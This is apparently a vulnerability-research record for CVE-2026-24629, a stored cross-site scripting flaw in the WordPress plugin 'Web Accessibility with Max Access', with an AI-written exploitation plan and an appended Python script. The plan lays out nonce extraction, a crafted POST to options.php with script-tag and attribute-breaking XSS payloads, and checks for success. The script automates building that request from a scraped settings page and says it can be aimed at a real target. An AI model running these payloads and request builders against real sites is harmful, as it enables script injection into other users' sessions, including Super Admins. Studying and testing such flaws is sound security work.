[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fXEqbZle_yfglNqeeqgmzzrSE19vTCD_8moscF4A4Vck":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":25,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":29},"CVE-2026-24629","web-accessibility-with-max-access-authenticated-administrator-stored-cross-site-scripting","Web Accessibility with Max Access \u003C= 2.1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting","The Web Accessibility with Max Access plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 
This only affects multi-site installations and installations where unfiltered_html has been disabled.","accessibility-toolbar",null,"\u003C=2.1.0","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-09 15:52:32","2026-02-03 13:48:30",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F423e10b3-5b1d-4162-ade4-3f6d69a9703e?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-24629\n\n## 1. Vulnerability Summary\nThe **Web Accessibility with Max Access** plugin (\u003C= 2.1.0) is vulnerable to **Authenticated (Administrator+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize user-supplied configuration settings during storage and subsequently fails to escape those settings when rendering them on the site's frontend and backend.\n\nAdministrators on a standard single-site install already hold the `unfiltered_html` capability and can post script legitimately, so this vulnerability only has an impact in **Multi-site** environments or installations where `DISALLOW_UNFILTERED_HTML` is defined as `true`: there it lets an administrator bypass the intended restriction and execute arbitrary JavaScript in the context of other users (including Super Admins).\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** Plugin settings page, typically handled via the WordPress Settings API (`wp-admin\u002Foptions.php`) or a custom AJAX\u002FPOST handler.\n*   **Vulnerable Parameter:** Likely configuration keys within the plugin's settings array (e.g., `max_access_settings`, `toolbar_label`, or `accessibility_statement`; these names are guesses and must be confirmed against the plugin's `register_setting()` calls).\n*   **Authentication Level:** Administrator or higher.\n*   **Preconditions:**\n    1.  The plugin \"Web Accessibility with Max Access\" (slug: `accessibility-toolbar`) must be active.\n    2.  
`unfiltered_html` must be disabled for the Administrator role (the default in Multisite, where only Super Admins keep it, or via `DISALLOW_UNFILTERED_HTML` in `wp-config.php`).\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point (Admin):** The administrator navigates to the settings page (likely `wp-admin\u002Fadmin.php?page=accessibility-toolbar-settings` or similar).\n2.  **Input Handling:** The plugin registers settings using `register_setting()`. If no `sanitize_callback` is supplied, or the callback does not neutralize HTML for the context the value is later rendered in (for example `sanitize_text_field()` strips tags but leaves double quotes, so an attribute-breaking payload survives, whereas `wp_kses()` with a strict allow-list would remove it), the payload is stored in the `wp_options` table.\n3.  **Storage:** `update_option()` is called with the raw\u002Finsufficiently sanitized `$_POST` data.\n4.  **Sink (Frontend\u002FBackend):** The plugin uses `get_option()` to retrieve the malicious string. It is then echoed into the HTML of the site (often on every page where the accessibility toolbar appears) without `esc_html()`, `esc_attr()`, or `wp_kses()`.\n    *   *Potential Sink Function:* `echo $options['toolbar_label'];` or similar inside a hook like `wp_footer`.\n\n## 4. Nonce Acquisition Strategy\nTo save settings, the plugin will require a WordPress nonce generated by `wp_nonce_field()`.\n\n1.  **Identify the Settings Page:** Determine the exact slug from the plugin's menu registration:\n    `grep -rnE \"add_(menu|submenu|options)_page\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Faccessibility-toolbar\u002F`\n2.  **Navigate and Extract:** Use the `browser_navigate` tool to go to the settings page as an Administrator.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` value from the settings form.\n    *   **JavaScript:** `document.querySelector('input[name=\"_wpnonce\"]').value`\n    *   **Action String:** If the plugin uses the Settings API, the nonce action is the option group name suffixed with `-options`: `settings_fields()` emits `wp_nonce_field( \"$option_group-options\" )` and `options.php` verifies it with `check_admin_referer( $option_page . '-options' )`, so the nonce must be taken from the form whose hidden `option_page` input carries that exact group name. If it's a custom handler, check for `check_admin_referer('action_name')`.\n\n## 5. 
Exploitation Strategy\nThe goal is to inject a script that will execute whenever the accessibility toolbar is loaded.\n\n**Step 1: Determine the Option Name**\nSearch the plugin code for the setting being saved:\n`grep -r \"register_setting\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Faccessibility-toolbar\u002F`\n\n**Step 2: Construct the Payload**\nWe will target a field likely rendered in the toolbar, such as a label or footer text.\n*   **Payload:** `\">\u003Cscript>alert(origin)\u003C\u002Fscript>`\n\n**Step 3: Submit the Request**\nUsing the `http_request` tool, simulate the form submission to `wp-admin\u002Foptions.php`.\n\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Foptions.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    option_page=[OPTION_GROUP]&\n    action=update&\n    _wpnonce=[EXTRACTED_NONCE]&\n    [SETTING_NAME][field_key]=%22%3E%3Cscript%3Ealert(origin)%3C%2Fscript%3E\n    ```\n\n**Step 4: Trigger Execution**\nVisit the site frontend (any post or page) to trigger the XSS.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `accessibility-toolbar` is installed and active.\n2.  **Create Admin User:** Ensure an admin user exists.\n3.  **Disable Unfiltered HTML:** Add the following to `wp-config.php` to simulate the vulnerable environment:\n    `define( 'DISALLOW_UNFILTERED_HTML', true );`\n4.  **Ensure Settings Exist:** Navigate to the plugin settings once to ensure default options are populated in the database.\n\n## 7. 
Expected Results\n*   The POST request to `options.php` should return a `302 Redirect` back to the settings page with `settings-updated=true`.\n*   When viewing the site frontend, the HTML source should contain the unescaped payload: `value=\"\">\u003Cscript>alert(origin)\u003C\u002Fscript>\"` or simply `\u003Cdiv ...>\u003Cscript>alert(origin)\u003C\u002Fscript>\u003C\u002Fdiv>`. If it instead shows `&lt;script&gt;alert(origin)&lt;\u002Fscript&gt;`, that sink escapes on output and the field is not exploitable there.\n*   A browser alert box should appear showing the site's origin.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the payload is stored raw in the database:\n    `wp option get [SETTING_NAME] --format=json`\n2.  **Source Code Check:** Verify the frontend output, matching on the tag rather than on `alert(origin)` alone, since the entity-escaped (safe) form also contains that substring:\n    `curl -s https:\u002F\u002F[TARGET]\u002F | grep -F \"\u003Cscript>alert(origin)\"`\n\n## 9. Alternative Approaches\n*   **Admin-side XSS:** If the payload doesn't render on the frontend, check the admin dashboard\u002Fsettings page itself. Stored XSS in the admin panel runs in the browser of whoever opens that page, so in Multisite it can be used to perform nonce-protected actions as a Super Admin.\n*   **Shortcode Injection:** If the plugin uses a shortcode to display the toolbar, check if shortcode attributes are vulnerable:\n    `[max_access_toolbar label='\u003Cimg src=x onerror=alert(1)>']`\n*   **Bypass `sanitize_text_field`:** If `sanitize_text_field` is used, it strips tags but leaves double quotes intact, so try attribute-based payloads that don't use `\u003C >` tags, such as:\n    `\" onmouseover=\"alert(1)` (if the output is inside an HTML attribute).","The Web Accessibility with Max Access plugin (\u003C= 2.1.0) is vulnerable to Stored Cross-Site Scripting (XSS) because it fails to sanitize and escape plugin settings during storage and output. 
This allows authenticated administrators to inject arbitrary JavaScript into settings that are rendered across the site, which matters in Multisite environments and on sites with DISALLOW_UNFILTERED_HTML, where administrators do not have the 'unfiltered_html' capability and the injected script also runs for Super Admins.","This vulnerability only has an effect on a site where the 'unfiltered_html' capability is restricted for administrators (such as a Multisite environment or a site with DISALLOW_UNFILTERED_HTML enabled); elsewhere an administrator can already post script legitimately. An attacker with Administrator-level access navigates to the plugin's settings page to extract a valid WordPress nonce and the relevant option group name. They then submit a crafted POST request to \u002Fwp-admin\u002Foptions.php, injecting a script payload (e.g., \">\u003Cscript>alert(origin)\u003C\u002Fscript>) into a configuration field like the toolbar label or accessibility statement. The malicious script is saved in the database and executes whenever a user, including site visitors or super admins, loads a page where the plugin's toolbar or settings are rendered.","gemini-3-flash-preview","2026-05-05 12:25:04","2026-05-05 12:25:23",{"type":30,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":31},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faccessibility-toolbar\u002Ftags"]
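Added example for sections 4, 5 and 8 of the research plan above. This is not code from the advisory, from Wordfence, or from the plugin; it only encodes what WordPress core's `settings_fields()` and `wp-admin/options.php` do with a Settings API form, and it shows why the frontend check should distinguish an unescaped sink from an escaped one. The option group `max_access_group`, the option name `max_access_settings`, the field key `toolbar_label`, the nonce value and all HTML snippets are constructed placeholders, not values observed on a real site.

```python
"""
Added example (not from the advisory, Wordfence, or the plugin): the
mechanics behind sections 4, 5 and 8 of the research plan, built from what
WordPress core's settings_fields() and options.php actually do. The option
group, option name, field key, nonce and all HTML below are constructed
placeholders, not values observed on a real site.
"""
import html
import re
from urllib.parse import urlencode

# Constructed sample of what settings_fields('max_access_group') plus one
# text field renders on a plugin settings page. Core mixes quote styles here
# (single quotes around option_page, double quotes around the nonce input).
SETTINGS_PAGE_HTML = """
<form method="post" action="options.php">
<input type='hidden' name='option_page' value='max_access_group' />
<input type="hidden" name="action" value="update" />
<input type="hidden" id="_wpnonce" name="_wpnonce" value="a1b2c3d4e5" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=accessibility-toolbar-settings" />
<input type="text" name="max_access_settings[toolbar_label]" value="Accessibility" />
</form>
"""

# Payload from the plan: closes a double-quoted attribute, then injects a tag.
PAYLOAD = '"><script>alert(origin)</script>'


def input_value(page: str, name: str):
    """Value of the first <input name=...> in page, or None if absent."""
    q = "['\"]"          # either quote style
    nq = "[^'\"]*"       # anything up to the closing quote
    pat = f"<input[^>]*name={q}{re.escape(name)}{q}[^>]*value={q}({nq}){q}"
    m = re.search(pat, page)
    return html.unescape(m.group(1)) if m else None


def nonce_action(option_group: str) -> str:
    """options.php runs check_admin_referer($option_page . '-options'), so the
    nonce action is the option group plus '-options', not the group alone."""
    return f"{option_group}-options"


def build_settings_post(page: str, option_name: str, field_key: str, value: str) -> dict:
    """Assemble the fields options.php expects: the hidden inputs lifted from
    the rendered settings page, plus the one setting being overwritten."""
    fields = {}
    for name in ("option_page", "action", "_wpnonce", "_wp_http_referer"):
        v = input_value(page, name)
        if v is None:
            raise ValueError(f"settings page is missing hidden field {name!r}")
        fields[name] = v
    fields[f"{option_name}[{field_key}]"] = value
    return fields


def encode_body(fields: dict) -> str:
    """application/x-www-form-urlencoded body for the POST to options.php."""
    return urlencode(fields)


def classify_output(frontend_html: str, payload: str) -> str:
    """Section 7/8 check. 'raw': the stored value reaches the page unescaped
    (exploitable). 'escaped': it comes back entity-encoded, which is what
    esc_html()/esc_attr() produce. 'absent': the field is not rendered here.
    Grepping for alert(origin) alone cannot tell the first two apart."""
    if payload in frontend_html:
        return "raw"
    if html.escape(payload, quote=True) in frontend_html:
        return "escaped"
    return "absent"


# Constructed frontend snippets for the same stored value: an unescaped sink
# (the inferred vulnerable pattern) versus one that escapes on output.
VULNERABLE_FRONTEND = '<div class="max-access-toolbar" aria-label="' + PAYLOAD + '"></div>'
FIXED_FRONTEND = (
    '<div class="max-access-toolbar" aria-label="' + html.escape(PAYLOAD) + '"></div>'
)

if __name__ == "__main__":
    fields = build_settings_post(SETTINGS_PAGE_HTML, "max_access_settings", "toolbar_label", PAYLOAD)
    print("nonce action:", nonce_action(fields["option_page"]))
    print("POST body:", encode_body(fields))
    print("vulnerable sink:", classify_output(VULNERABLE_FRONTEND, PAYLOAD))
    print("fixed sink:", classify_output(FIXED_FRONTEND, PAYLOAD))
```

Run as-is it prints the urlencoded body the plan's Step 3 describes and classifies the two constructed sinks; against a real target, `SETTINGS_PAGE_HTML` would be the fetched settings page and `classify_output` would be run over the fetched frontend HTML. The `_wp_http_referer` field is carried along because `options.php` uses it to build the `settings-updated=true` redirect.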